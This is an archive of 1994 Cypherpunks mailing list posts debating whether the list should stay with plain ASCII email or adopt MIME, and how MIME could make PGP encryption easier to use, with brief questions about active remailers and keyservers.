Message-ID: <199412160310.TAA23794@netcom10.netcom.com>

Amanda Walker wrote:

(quoting me)
> > But this isn't 15 years ago, and I daresay there isn't a _single_
> > subscriber to the Cypherpunks list using a VIC-20 or anything remotely
> > similar. Of the 600 or so subscribers, and certainly of the 100-200
> > involved posters, I would bet that essentially all of them can display
> > ASCII text on an 80-column screen.
>
> ... when they're at their desk. There has been an explosion, however, of
> non-80-column-capable devices on which people want to read their email.
> Alphanumeric pagers, Handheld PDAs, palmtop computers, etc. Give me a radio
> modem with reasonable service coverage, and I'd want to read at least some
> kinds of mail on my Newton (about 32-48 characters across the display).
> In fact, the ability to display graphics is becoming universal in areas
> where 80 columns have been tossed aside.

This of course is not an easily solvable problem. And I believe it
actually makes my point, that _text_ remains about the only lingua
franca we have: if I send messages out to the list that can be read by
the greatest number of subscribers, with Newtons, Magic Cap
doohickies, radiomail-to-fax, Suns, Ataris, Indigos, Amigas, and even
VIC-20s, it is almost certainly the case that text can be read by most
of them (I'm talking about the _contents_ of the message; the delivery
level is another set of issues).

> Very few people use actual terminals any more. I'd be amazed if any more
> than 5-10% of the readership of this group (and the Internet at large)
> were using anything but a graphics display, even if it's emulating a VT100.

"Actual" terminals is not the issue, but "virtual" terminals *is*. I
haven't done a poll lately, or ever in fact, but my hunch is that 70%
of the list is emulating some form of terminal, e.g., a VT-100 or 102,
or maybe something slightly more exotic. Or a shell program, as in
America Online, which has its own standard.

Perry made the same point that Amanda makes, that my Macintosh _should
be_ usable as a graphics system, not just for ASCII text. Well, I
agree, but so what?

-- Netcom doesn't give me a convenient way to bypass the dial-up
terminal emulators (PPP and SLIP are no longer offered by Netcom)

-- Local Internet providers (ScruzNet, SenseMedia) are not, last I
checked, offering e-mail. (Harry Bartholomew, of our list, has been
looking into this and he tells me the best current strategy is to have
two accounts: a SLIP or PPP provider for the Web, and ftp, etc., and a
standard Netcom account for mail. I expect this to change, which is
the thrust of my comments about the Web, but this is how things now
change.)

-- The communication issue. What are _others_ using?
I could certainly use my _graphics_ capabilities in the ways that Amanda and Perry are suggesting, and which I do all the time of course, but messages would still best be generated with an ASCII terminal environment as the intended destination. I note that all of Perry's messages, and most of Amanda's messages, fit this ASCII model.

(The MIME stuff I'm not saying shouldn't be used, just that some of us--perhaps most of us, is my hunch--will not be adopting the latest bleeding edge technology. The comments here about Sun and Microsoft not properly--or at all--supporting MIME tell us that it's not real likely that most folks here will be sending spreadsheets out to the list readers and attaching GIFs anytime soon. No great loss, either.)

Finally, Amanda mentioned "being away from our desks." Well, many of us are _always_ away from our desks when we post. From home machines, not from T3-connected Indigos on our desk. And we're usually our own "mail support" staff: we have no one to turn to help us set up the latest-and-greatest (especially for a very minimal ROI).

This is not, despite what it may look like, a bitch. I am content to mainly communicate with most of you in the form of these ASCII messages. I've done a _lot_ of desktop publishing in my day, mostly for internal reports and conference papers, and I can't really say that the fancy fonts, graphs, multicolumn displays, etc, would have much effect on my ability to get my points across.

One thing I would like very much is the ability to include simple diagrams and drawings in my posts, but this is clearly an _unsolved_ problem, from a practical point of view. (Before any of you scream to me about how this can be done, ask yourself how many people could plausibly _see_ the results, given the realities of the Net today, and ask yourself where all these posts-with-diagrams are if they're so easy to do.)
I'm really not happy at being portrayed as the list's leading Luddite, but it's a cross I guess I'll have to bear. I still say folks ought to read Arthur C. Clarke's short story, "Superiority."

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From perry at imsi.com Thu Dec 15 19:32:36 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 15 Dec 94 19:32:36 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To:
Message-ID: <9412160332.AA01834@snark.imsi.com>

"James A. Donald" says:
>
> So how can I do true graphical mime with the wondrous window
> like drag and drop features described by Perry on a
> Sparc 20

The mail handler that comes with the Andrew package does do the graphics inline. You can just FTP it and compile it for your machine. I don't know if it does drag and drop. There is a commercial product called Zmail that is pretty good and handles all the drag and drop (motif style) that you would want -- it doesn't do the graphics inline, though -- it spawns new windows to show the images. I understand you can get demos by FTP from the company.

> Obviously, once you can drag and drop from html to mime and back
> again, and PGP is properly mimed, then we will have a tool
> such that even the chairman of the board will use PGP.

Well, people will first have to incorporate the new Security Multiparts stuff into their MIME implementations -- it's brand new (just approved a week ago) so I suspect that it will take a bit of time.
Perry

From tcmay at netcom.com Thu Dec 15 19:38:47 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 19:38:47 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <9412152113.AA00540@firefly.prairienet.org>
Message-ID: <199412160338.TAA26446@netcom10.netcom.com>

Jeff Licquia wrote:

> Well, ignoring the fact that MIME appears to be infiltrating the Web as well...
>
> I would differ with your analysis of MIME's lack of usefulness. It does
> provide a possible way to integrate PGP into the mail/Web landscape (from a
> crypto standpoint). Multimedia I'm not so sure about; I think the big draw
> to MIME will come when Person A drags and drops a spreadsheet into a MIME
> mailer and sends the message to Person B, who then clicks on an icon to pull
> up the spreadsheet. But I digress...

My issue has not been with MIME as a transport mechanism, but non-ASCII content, which clearly most folks can't read.

> I'd say, however, that MIME isn't a done deal yet, though it's getting
> there. Until it's there, it's probably a bad idea. It's been my experience
> that many mailers are just MIME-compliant enough to cause their users lots
> of headaches.

Amen! This is the same point several people have made in follow-ups. The whole bit about transferring spreadsheets is nice--we've been able to do it on the Mac for many years, provided both sides have the right spreadsheet programs of course--but it's not of much use in communicating as we do on a mailing list. And "true MIME" is not what many so-called "MIMEs" apparently are.

> (As I write this, I notice I'm using Eudora, which MIMEs all its stuff. Oh,
> well; I hope this message isn't too much trouble for y'all...)

It wasn't marked as Mime, and it gave me no trouble. Perhaps because looking at your headers reveals:

X-Mailer: Windows Eudora Version 1.4.3
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

I think the Content-Type field is the key.

Is this the answer? Not completely.
Part of the whole "complexity" issue I've been railing about (and echoed by such noted Neo-Luddites as Phil Zimmermann, John Markoff, and others) is that increasing numbers of messages need special processing, hang up my automatic downloading (as when my Eudora hangs in the middle of a long transfer, asking for instructions on how to handle an exception or special case, and Netcom hangs me up, forcing me to start over later and then babysit the transfer process so I can be there when Eudora hollers for help), and generally complicate our lives more than they help.

Would Einstein have wasted his time trying to configure his mailer so he could see Amanda's GIF? (No offense meant, Amanda.))

****AUTOMATIC TRANSFER OF CYPHERNOMICON COMPLETE****
Error 51: HARD DISK IS FULL
Automatic Action 32A: Delete least-recently changed files.
****STARTING DELETIONS NOW*****
Do you wish to continue? (y/n)

From perry at imsi.com Thu Dec 15 19:45:54 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 15 Dec 94 19:45:54 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412160310.TAA23794@netcom10.netcom.com>
Message-ID: <9412160343.AA01846@snark.imsi.com>

Timothy C. May says:
> -- Netcom doesn't give me a convenient way to bypass the dial-up
> terminal emulators (PPP and SLIP are no longer offered by Netcom)
>
> -- Local Internet providers (ScruzNet, SenseMedia) are not, last I
> checked, offering e-mail.

Most of the service providers in New York support SLIP customers running POP clients. The bay area has far more providers than New York. Surely someone out there can help Tim find a provider that will give him a SLIP connection and POP and NNTP servers.

> -- The communication issue. What are _others_ using?
I could certainly
> use my _graphics_ capabilities in the ways that Amanda and Perry are
> suggesting, and which I do all the time of course, but messages would
> still best be generated with an ASCII terminal environment as the
> intended destination. I note that all of Perry's messages, and most of
> Amanda's messages, fit this ASCII model.

If you are using SLIP, you no longer care about graphics on your end since the host you are talking to is your own. You would, however, need to have a MIME capable mailer on your end. I understand that the commercial version of Eudora is o.k. in this regard but not great -- it will let you deal with the stuff but not as cleanly as something like NeXTMail would have. However, since you are going to have to go in that direction eventually anyway I'd suggest that moving to using your computer as a host and not as a very expensive VT102 clone is the way to begin.

> Finally, Amanda mentioned "being away from our desks." Well, many of
> us are _always_ away from our desks when we post. From home machines,
> not from T3-connected Indigos on our desk.

Your Mac is quite a respectable machine -- it's handling all your mail traffic right now without any trouble, and I'm sure it will do just fine handling everything directly as a host via SLIP or PPP.

> One thing I would like very much is the ability to include simple
> diagrams and drawings in my posts, but this is clearly an _unsolved_
> problem, from a practical point of view. (Before any of you scream to
> me about how this can be done, ask yourself how many people could
> plausibly _see_ the results, given the realities of the Net today, and
> ask yourself where all these posts-with-diagrams are if they're so
> easy to do.)

I'd say that most of us could. Almost no one is using a dumb terminal -- just terminal emulator software.
For those of us with MIME capable readers (which for practical purposes could be everyone on the list if they wanted them) you could enclose a set of line drawings with your messages. If they are simple, they will compress very well and should not take up very much room.

You are right, by the way, that I post in ASCII. That's just because I have no urge to include diagrams and I use Emacs as my mail reader out of force of habit. If I want to look at MIME, though, I just pop into another window and type "mhn NUMBER", where NUMBER is the number of the message I want to view. It's not too inconvenient at all, although it isn't as "gee whiz" as many people would like. I'm not the sort that needs "gee whiz" though. I read about a dozen MIME messages a day at this point, and when MIME ends up being all my traffic I'll rig up a slightly cleaner interface.

I do send MIME on occasion, by the way, when I want to send graphics, binary files, or other enclosures.

Perry

From shamrock at netcom.com Thu Dec 15 19:52:31 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 15 Dec 94 19:52:31 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID:

The thread is back...

Tim wrote:

>I deeply resent--but will try not to take it personally, so no
>animosity to Perry or Jim or others is intended--the insinuation
>through sarcasm or through direct statements that I am hopelessly
>wedded to a past of ASR-33 terminals and good old-fashioned
>typewriters. Like a lot of folks here, I use stuff that's far beyond
>simple ASCII. I think I've adequately covered this point.

After reading many of your posts on the MIME issue, I have come to the conclusion that you _are_ wedded to a past long gone. I have not given up the hope that we will one day convince you to stop accessing the net via the worst possible interface, a terminal server. The way you are using the net is through 1950's technology with 1950's results.
You say that you use stuff that is far beyond ASCII and I believe you. However, one wouldn't know from hearing what tools you are using to access the net. You are competent, a computer person, but still you don't seem to understand that reading mail via a terminal server and elm is like having an oxen pull your car.

>Eric Hughes wrote a nice piece several weeks back about adoption of
>new technology, new tools all being a matter of _return on
>investment_.
>For example, I could spend some number of hours switching from my
>current mail program (elm) to some other editor which perhaps
>better-supported the MIME messages seen here. But if all I got for
>several hours of using, learning, and becoming comfortable with, say,
>"pine," was the ability to see an _italicized_ word, or a word in
>Cyrillic, then I would consider this a poor ROI.

You got Eudora. Setting up tia ($25) on your account and downloading Newswatcher, etc. takes less than an hour. In fact, I will gladly do it for you. After the clients are set up on your own machine, there is no reason to go back to using the shell. I have used the shell *two* times in the last three months. -- To change my password.

You wouldn't have to change your workhabits. You could still read news, answer email, and surf the web all at the same time. In fact, you could do it better and easier than you do it now.

>And nobody has yet said there's anything worth doing this for in any
>of the MIME messages I've yet seen. Sure, Amanda W. exercised the
>process by including a GIF....a process which several people saw
>errors with, and no doubt many others skipped completely.
>
>Does this make me backward? No. It's all ROI.

I have AppleScript droplets on my desktop for all the people I work with. Drag the spreadsheet icon on it. Hit "Queue". They double click on it on their desktop. Happens every day.

>Like it or not, we are now in a mostly-ASCII Net environment.
This
>shows up when people fail to convert special characters (apostrophes,
>left and right quotes, em dashes, bullets, etc.) into the "straight
>ASCII" characters (such as ', ", --, *) that most of the rest of us
>can display easily. People rightly complain about posts and messages
>filled with "^H" and other oddball symbols.

This list is email and, yes, it is in ASCII. There is little reason to change that. But that doesn't mean that most of the net is in ASCII. I spend less than half the time that I am on the net in a pure ASCII environment. And it is getting less every month.

>(And it certainly doesn't mean that people like me don't have the
>capability of displaying extended character sets....I clearly can,
>given the right tools, effort, etc. Many can't, and many won't. The
>"Display Postscript" standard was an attempt to bootstrap the world to
>a new standard for document display, and it failed. Maybe the "Andrew
>Message System" is another such fix. Maybe it's even better designed.
>All well and good. But it ain't available to most of us. Nor would I
>even install it if all I got was em dashes and the like displayed
>correctly. ROI, again.)

I hate to break it to you, but it is no longer "most of us" who don't use these tools. And of the ones that don't use them, only very, very, few don't have them available.

>Please don't characterize my views as Luddite wishes for a simpler
>world.

I don't think that you are wishing for a "simpler world". I believe that you haven't realized that the "simpler world" has long vanished in the dust of history and that you are one of the last hold outs living in an era past. Please don't be the last to leave.

-- Lucky Green PGP encrypted mail preferred.

From unicorn at access.digex.net Thu Dec 15 20:00:32 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Thu, 15 Dec 94 20:00:32 PST
Subject: Remailers and Keyservers, active ones?
Message-ID:

Is there a list of the currently active remailers and key servers?
-uni- (Dark)

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From amanda at intercon.com Thu Dec 15 20:30:57 1994
From: amanda at intercon.com (Amanda Walker)
Date: Thu, 15 Dec 94 20:30:57 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID: <9412152330.AA33865@eldamar.walker.org>

Tim May writes:
> "Actual" terminals is not the issue, but "virtual" terminals *is*.
> I haven't done a poll lately, or ever in fact, but my hunch is that 70%
> of the list is emulating some form of terminal, e.g., a VT-100 or 102,
> or maybe something slightly more exotic. Or a shell program, as in
> America Online, which has its own standard.

I'd actually be interested in a poll, but I know better than to actually ask for one :).

> Perry made the same point that Amanda makes, that my Macintosh _should
> be_ usable as a graphics system, not just for ASCII text. Well, I
> agree, but so what?

I have to admit some bias here--our flagship product for the Macintosh contains a very MIME-aware mailer (which I am working on making crypto-aware as well), and which was designed to make MIME seamless. No helper software, no extracting pieces and finding a viewer for them, it just works.

> I note that all of Perry's messages, and most
> of Amanda's messages, fit this ASCII model.

In my case, it's because I intentionally make them fit. Most mailing lists have a general expectation of plain ASCII. When I send mail to other people at InterCon, I (and the recipients) see something that looks like any other Mac document--nice formatting, diagrams and screen shots displayed inline, and so on. And when someone sends me a file via email, even if they're not using a MIME mailer, it shows up as an icon I can drag to a folder in the Finder.

This isn't really a commercial for my product, though :).
This is how I think MIME was meant to be implemented, and it's analogous to how I think encryption should be implemented. Forget helper applications, macros, and so on. There should be two popup menus on the envelope: "sign with" and "encrypt with". When you select them, you get prompted for your passphrase, and it just works. This is the same direction that other commercial vendors are headed, and it's this kind of simplicity that I think will finally get people to start using the technology (just as with MIME). On this, I suspect the Netscape folks and I are in violent agreement :), as probably are you from some of your comments to this list...

> (The MIME stuff I'm not saying shouldn't be used, just that some of
> us--perhaps most of us, is my hunch--will not be adopting the
> latest bleeding edge technology.

Right now, PGP is more of a bleeding edge technology than MIME is, IMHO.

> Finally, Amanda mentioned "being away from our desks." Well, many of
> us are _always_ away from our desks when we post. From home machines,
> not from T3-connected Indigos on our desk.

Indeed, that's why I brought it up; at the moment, I'm sitting in my study at home posting over a dialup (14.4K) PPP link. I've also posted from 37,000 feet sitting in a DC-10 (in coach :)), with my mail being queued up until I could jack into a phone when I land.

> One thing I would like very much is the ability to include simple
> diagrams and drawings in my posts, but this is clearly an _
> unsolved_ problem, from a practical point of view.

Hmm. I'd say it's a partially solved problem. Newsgroups like clari.features.dilbert are popular enough that there's at least a significant fraction of people who can handle MIME messages with embedded graphics.

> and ask yourself where all these posts-with-diagrams are
> if they're so easy to do.)

Well, I could start posting some, if you want existence proofs :)...
Amanda Walker
InterCon Systems Corporation

From tcmay at netcom.com Thu Dec 15 20:31:37 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 20:31:37 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To:
Message-ID: <199412160431.UAA03092@netcom10.netcom.com>

Lucky Green wrote:

> After reading many of your posts on the MIME issue, I have come to the
> conclusion that you _are_ wedded to a past long gone. I have not given up
> the hope that we will one day convince you to stop accessing the net via the
> worst possible interface, a terminal server. The way you are using the net
> is through 1950's technology with 1950's results.

Hmmhh. I was _there_ in the 1950s, I _knew_ the 1950s. And let me tell you, this is *not* the 1950s. (Apologies to Lloyd Bentsen.)

It may be backward, but it is how a huge fraction of the list accesses the Net. Am I wrong on this? Dial-up access to local POPs is a fact of life for many, many people. Do a "who cypherpunks" on the list and look at the sites. Many will be dial-ups, others will be access to university machines, via dial-ups, etc. Others will be a mix of corporate machines, some with better connectivity than others, and many with proprietary e-mail systems, such as VAXMail and the like.

My guess is that fewer than 20% of the list are directly SLIP- or PPP-connected, with good access to the tools praised here by Amanda, Perry, you, and others. It might be a good idea to get some real statistics on this. We did this a couple of years ago, and there was talk about doing it again.

For reasons I just addressed in another post, I foresee being on a dial-up (not a SLIP or PPP, that is) for a while. And I have relatively few complaints about it. My service provider keeps the 9446 current newsgroups, provides ftp and suchlike tools, and I don't have to be a sysadmin. Frankly, if I have to choose between not being able to see someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll skip the GIFs.
> You say that you use stuff that is far beyond ASCII and I believe you.
> However, one wouldn't know from hearing what tools you are using to access
> the net. You are competent, a computer person, but still you don't seem to
> understand that reading mail via a terminal server and elm is like having
> an oxen pull your car.

Even Perry admits to using emacs, and Unix mailers like elm are not exactly oxen. (I have a choice of several mailers, the usual ones. Big deal.) I also have commercial Eudora, the PowerMac version no less, so my offline mailer is adequate. This still doesn't mean non-ASCII (graphics, fancy fonts, equations) can be plausibly placed in messages--and communicated to the list for reading/viewing.

> I hate to break it to you, but it is no longer "most of us" who don't use
> these tools. And of the ones that don't use them, only very, very, few
> don't have them available.
>
> >Please don't characterize my views as Luddite wishes for a simpler
> >world.
>
> I don't think that you are wishing for a "simpler world". I believe that
> you haven't realized that the "simpler world" has long vanished in the dust
> of history and that you are one of the last hold outs living in an era
> past. Please don't be the last to leave.

I'd like to see some evidence that I am one of the last of my tribe. Call me Ishi.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks.
FAQ available at ftp.netcom.com in pub/tc/tcmay

From warlord at MIT.EDU Thu Dec 15 20:31:59 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Thu, 15 Dec 94 20:31:59 PST
Subject: Remailers and Keyservers, active ones?
In-Reply-To:
Message-ID: <9412160431.AA05950@toxicwaste.media.mit.edu>

The active remailers get periodically posted. I forget the site where you can request the current list.

As for keyservers, I think my list is fairly out of date, but you can try sending mail to my keyserver (pgp-public-keys at pgp.mit.edu) with a subject of "help", and it will reply with a list of keyservers.

-derek

From sdw at lig.net Thu Dec 15 20:52:32 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Thu, 15 Dec 94 20:52:32 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152139.PAA25566@pentagon.io.com>
Message-ID:

>
> Tim wrote:
> > Jim McCoy wrote:
> > > On this particular subject you just haven't got a fucking clue what you are
> > > talking about Tim.
> >
> > So polite, so succinct.
> >
> > I'll remember this.
>
> Please do. There are a great many issues which your input and opinions are
> a valuable contribution to the content of this list. There are others
> where you seem to make guesses as to where things are going without having
> much of a leg to stand on. Your MIME position hurts the widespread use of
> cryptography because the advantages MIME gives to crypto far outweigh the
> short-term costs associated with a systemic upgrade to a better method for
> message transport and encapsulation.
>
> jim

People should learn when to yield sometimes....

sdw

--
Stephen D.
Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw
Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From shamrock at netcom.com Thu Dec 15 21:04:10 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 15 Dec 94 21:04:10 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID:

Tim wrote:

[...]

>I think a generation exposed to Mosaic and similar browsers will want
>to find ways to use these windows into the Net for _nearly
>everything_. They will not want to buy or learn separate mail
>programs, negotiate separate accounts, or deal with MIME sorts of
>issues. They will ask for, and get, "gateways" between mail and the
>Web. (Gateways may not be the right word.)

People don't deal with MIME. Computers do. The average user shouldn't be any more concerned with MIME info than with IP header length. That your inadequate and buggy mailreader exposes you to the inner workings of MIME shouldn't be held against the standard.

>My main point is that the most compelling strategy seems to be to
>stick with ASCII for a while, avoid minor-but-painful gains with
>Postscript, Acrobat, Replica, TeX, FrameViewer, etc., and then jump to
>the Web/html/http/blah blah when the time is right.

The two (email and web) are not alternatives, as you have stated in your previous post. Email has gone to MIME. HTTP couldn't exist without MIME.

What on earth is your problem with MIME? Your posts read like they come from someone who complains about 8 bit data on the net because every time they display it on their terminal it makes strange noises and generally screws things up. PLEASE stop using your VTwhatever emulator and you will find that MIME becomes a non-issue. Out of sight, out of mind.
All you will notice is that all of a sudden you get more out of the net while finding it simpler to use. PLEASE! For your benefit and ours.

-- Lucky Green PGP encrypted mail preferred.

From shamrock at netcom.com Thu Dec 15 21:04:20 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 15 Dec 94 21:04:20 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID:

Tim wrote:

>"Actual" terminals is not the issue, but "virtual" terminals *is*. I
>haven't done a poll lately, or ever in fact, but my hunch is that 70%
>of the list is emulating some form of terminal, e.g., a VT-100 or 102,
>or maybe something slightly more exotic. Or a shell program, as in
>America Online, which has its own standard.

If they are using terminal emulation they have only themselves to blame.

[...]

>-- Netcom doesn't give me a convenient way to bypass the dial-up
>terminal emulators (PPP and SLIP are no longer offered by Netcom)

The Internet Adapter ($25) http://marketplace.com/

>-- Local Internet providers (ScruzNet, SenseMedia) are not, last I
>checked, offering e-mail. (Harry Bartholomew, of our list, has been
>looking into this and he tells me the best current strategy is to have
>two accounts: a SLIP or PPP provider for the Web, and ftp, etc., and a
>standard Netcom account for mail. I expect this to change, which is
>the thrust of my comments about the Web, but this is how things now
>change.)

The Internet Adapter ($25) http://marketplace.com/

>-- The communication issue. What are _others_ using? I could certainly
>use my _graphics_ capabilities in the ways that Amanda and Perry are
>suggesting, and which I do all the time of course, but messages would
>still best be generated with an ASCII terminal environment as the
>intended destination. I note that all of Perry's messages, and most of
>Amanda's messages, fit this ASCII model.

I can't help but wonder how big of a part you play in this.
>(The MIME stuff I'm not saying shouldn't be used, just that some of
>us--perhaps most of us, is my hunch--will not be adopting the latest
>bleeding edge technology. The comments here about Sun and Microsoft
>not properly--or at all--supporting MIME tell us that it's not real
>likely that most folks here will be sending spreadsheets out to the
>list readers and attaching GIFs anytime soon. No great loss, either.)

Not to the list, but to others -- over email.

>Finally, Amanda mentioned "being away from our desks." Well, many of
>us are _always_ away from our desks when we post. From home machines,
>not from T3-connected Indigos on our desk.

DUO 230. Can't go to 14.4, because I am "too far from the switch." PacBell won't do anything about it. "All we guarantee is audible voice communication."

ObPlug: Today we received the first two engineering samples of our new lan/phone/video devices that give you 16Mbps using the very same 4 phone wires that are already in your wall. At less than $100 per node. Call your congressman today and demand local telco deregulation :-)

>And we're usually our own "mail support" staff: we have no one to turn
>to help us set up the latest-and-greatest (especially for a very
>minimal ROI).

I volunteer.

>I am content to mainly communicate with most of you in the form of
>these ASCII messages. I've done a _lot_ of desktop publishing in my
>day, mostly for internal reports and conference papers, and I can't
>really say that the fancy fonts, graphs, multicolumn displays, etc,
>would have much effect on my ability to get my points across.

Agreed.

>One thing I would like very much is the ability to include simple
>diagrams and drawings in my posts, but this is clearly an _unsolved_
>problem, from a practical point of view.
(Before any of you scream to
>me about how this can be done, ask yourself how many people could
>plausibly _see_ the results, given the realities of the Net today, and
>ask yourself where all these posts-with-diagrams are if they're so
>easy to do.)

Uhm, most people?

-- Lucky Green PGP encrypted mail preferred.

From mccoy at io.com Thu Dec 15 21:06:28 1994
From: mccoy at io.com (Jim McCoy)
Date: Thu, 15 Dec 94 21:06:28 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412160310.TAA23794@netcom10.netcom.com>
Message-ID: <199412160506.XAA25917@pentagon.io.com>

"Ishi" writes:

[...]

> (The MIME stuff I'm not saying shouldn't be used, just that some of
> us--perhaps most of us, is my hunch--will not be adopting the latest
> bleeding edge technology. The comments here about Sun and Microsoft
> not properly--or at all--supporting MIME tell us that it's not real
> likely that most folks here will be sending spreadsheets out to the
> list readers and attaching GIFs anytime soon. No great loss, either.)

Substitute PGP or "cryptography" for MIME in the paragraph above and you will probably see why your attitude regarding the usefulness of MIME has so many of us in disagreement.

I agree with Amanda's opinion that MIME is less bleeding-edge than PGP, it has a well-defined standard and there are actually a few good implementations of it out there. The fact that Microsoft has succumbed to the necessity of including MIME support is probably a good indication of how far MIME has progressed (not good support at the moment, but two years ago they were refusing to support MIME and suggesting the net adopt MAPI...) I still cannot go out and buy a mail program with PGP built into it, but I can find several with MIME.

MIME will even make PGP and strong encryption more widespread because it will make encryption/decryption and signing/verifying messages simple and standard callouts from the mail program to an encryption engine.
Instead of someone needing to search around for patches to Pine to integrate PGP [a task which significantly raises the clue level needed to easily encrypt mail] they will just add a line to their mailcap file (or it will already be bundled into their mail/news/www agents.)

If you are truly interested in making strong encryption easy and transparent to the vast majority of the users of future communications systems you should be leading the MIME charge, not holding everyone back...

jim

From alex at omaha.com Thu Dec 15 21:23:24 1994
From: alex at omaha.com (Alex Strasheim)
Date: Thu, 15 Dec 94 21:23:24 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID: <199412160524.XAA00746@omaha.omaha.com>

-----BEGIN PGP SIGNED MESSAGE-----

> People should learn when to yield sometimes....

I think Tim is getting a bad rap here. It's one thing to make a mail system that exchanges secure mail, or allows you to put pictures in it, or whatever, and it's another thing altogether to make a mail system which does all of those things and which can actually communicate with the many millions of people out in the real world.

It's easy to say, "if everyone listened to me, and did things my way, we'd have all these new features." That may be true, but it's not going to happen. Even the existence of a reasonably well-accepted standard like MIME won't ensure success. What's a standard compared to a huge base of installed software?

As influential as Tim is, it doesn't matter whether he embraces MIME or not. If he converted tonight, there'd still be millions of people who feel the way he felt this morning. Getting Tim to capitulate isn't going to solve the problem.

The sociology and politics of evolving standards is an important issue on the net, and it seems to me that things are a little more complicated than some posters are admitting.
If cypherpunks are going to have an influence on how things turn out, we're going to have to come to terms with the issues Tim has been raising. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvEkYBEpP7+baaPtAQFYVwQAlkVMN0setRaiLvPzyITrzGp5/W7la4Ql 8PjLcnP+yIAmV2BmCjDmC0tEK2tc/JBgqMYvrcPBNGIhaD3oGEn/9YTaZuyCAjGB KdrHLA7i4dEn0AQCZdMsdVJ025hBO8/IYbBqt+M5LnXF4XTuBlUlqNyY+7/upC56 jyfUkEVAMfQ= =LXyA -----END PGP SIGNATURE----- From amanda at intercon.com Thu Dec 15 21:41:12 1994 From: amanda at intercon.com (Amanda Walker) Date: Thu, 15 Dec 94 21:41:12 PST Subject: MIME acceptance test--where's the break-even point? Message-ID: <9412160040.AA57914@eldamar.walker.org> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 2126 bytes Desc: not available URL: From jrochkin at cs.oberlin.edu Thu Dec 15 21:41:54 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 15 Dec 94 21:41:54 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: Alex Strasheim wrote: >The sociology and politics of evolving standards is an important issue on >the net, and it seems to me that things are a little more complicated than >some posters are admitting. If cypherpunks are going to have an influence >on how things turn out, we're going to have to come to terms with the >issues Tim has been raising. Can someone (Tim maybe?) clearly delimit exactly what the issues Tim has been raising _are_? As far as I can tell, the issue is simply that current tools out there to deal with enhanced mail features (like PGP encryption) just aren't easy enough to use yet. There seem to be two simple ways to deal with this: 1) Try to develop easier to use tools 2) Try to convince people that the current tools aren't as hard to use as they think. 
I am absolutely convinced that mailers supporting MIME in a rational way, along with the new PGP MIME specifications, are the answer to number 1. I feel confident that anyone who examines the MIME specs will agree that if mailers supported it reasonably, dealing with PGP would be easy. I'm not sure everyone here who is deprecating MIME understands what it really is. MIME has nothing to do with annoying messages on your screen, and a reasonable mailer wouldn't give you those messages.

But I think people on the list are doing both of those two things. People who know how to code, and who think that current tools _aren't_ easy enough to use, are putting more emphasis on #1 (whether their solution involves MIME or not). People who don't have the coding skills or inclination, or who think the current tools are significantly easier to use than most people realize, are putting more emphasis on #2.

Those are the real issues here I think. The convincing people part is really secondary, in my opinion, because the current tools are nowhere near good enough. The developing easier tools is important, and if anyone wants to discuss how to do this, I'm certainly interested in it. Like I said, I'm convinced MIME is the answer, but a lot more needs to be said than "MIME is the answer" (like what is meant by my phrase "supporting MIME in a rational way"), and I'm also certainly willing to consider the idea that MIME isn't the answer after all.

But comments like "well, MIME is completely irrelevant, email will eventually disappear in favor of the web," or similar stuff, just leave me confused, and seem completely irrelevant to me. The issue is making PGP easier to use. If anyone really thinks that the way to do this somehow involves HTTP, then I'd be glad to listen to an explanation of that. But as far as I can tell, whether you are talking about email or ftp or HTTP, the answer is about MIME, and not about those transport protocols.
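
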